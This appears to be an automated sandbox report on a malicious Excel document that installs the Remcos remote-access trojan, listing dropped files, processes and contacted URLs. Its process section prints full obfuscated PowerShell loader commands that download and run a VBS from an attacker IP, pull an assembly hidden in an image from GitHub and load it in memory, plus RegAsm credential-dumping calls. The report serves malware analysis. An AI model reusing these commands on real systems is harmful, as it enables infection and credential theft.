Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
037002451082_10142024.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 06:22:49 2024, Security: 1
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\037002451082_10142024.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestpricewithgoodcookiesme[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B555AA9.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D50DAA.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DDD6DA3.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BB2114.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2D88348.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF5F096.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1gfcu5a3.m0x.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES3EB6.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:05:53 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES8131.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:06:10 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\baytxyi3.vxz.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv8F64.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x1f8f070d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ftk5ompf.zvt.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\hcettl45.s5s.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jdevsgkx.xgo.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jj3fbras.2im.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\kfigqppl.s5a.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\kqsyfh00.s0u.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\n55tten3.zim.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\osyqdozz.rni.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\pimcdet1.ihu.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rheitgef.bqq.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sgej4rnv.ehw.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\tgkhu3pa.dnc.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\w0u2unns.4vq.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zy5ppnwn.wi2.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF3D1775BC0D61434C.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFC58CC94B888EDF2D.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFD20930BBBA1449A8.TMP
|
data
|
dropped
|
||
C:\Users\user\Desktop\7D330000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\7D330000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 40 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex
byPaSs -nop -W 1
-c DevicECrEdentiaLdEploymeNt.eXe ;
IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg
NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText
= [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex
= tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex
-gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+'
= tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y
= [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null,
@(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL,
NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39)
| . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex
byPaSs -nop -W 1
-c DevicECrEdentiaLdEploymeNt.eXe ;
IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg
NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText
= [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex
= tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex
-gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+'
= tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y
= [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null,
@(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL,
NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39)
| . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp"
"c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp"
"c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
|
There are 12 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF
|
192.3.220.40
|
||
idabo.duckdns.org
|
|||
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
|
185.199.108.133
|
||
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
|
192.3.220.40
|
||
http://192.3.220.40/450/RRFCCE.txt
|
192.3.220.40
|
||
http://b.scorecardresearch.com/beacon.js
|
unknown
|
||
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaCKWWS
|
unknown
|
||
http://acdn.adnxs.com/ast/ast.js
|
unknown
|
||
http://192.3.220.40/viderI
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
https://jfm.com.co/e
|
unknown
|
||
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
|
unknown
|
||
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaccepC:
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://support.google.com/chrome/?p=plugin_flash
|
unknown
|
||
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
|
unknown
|
||
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
|
unknown
|
||
http://go.micros
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
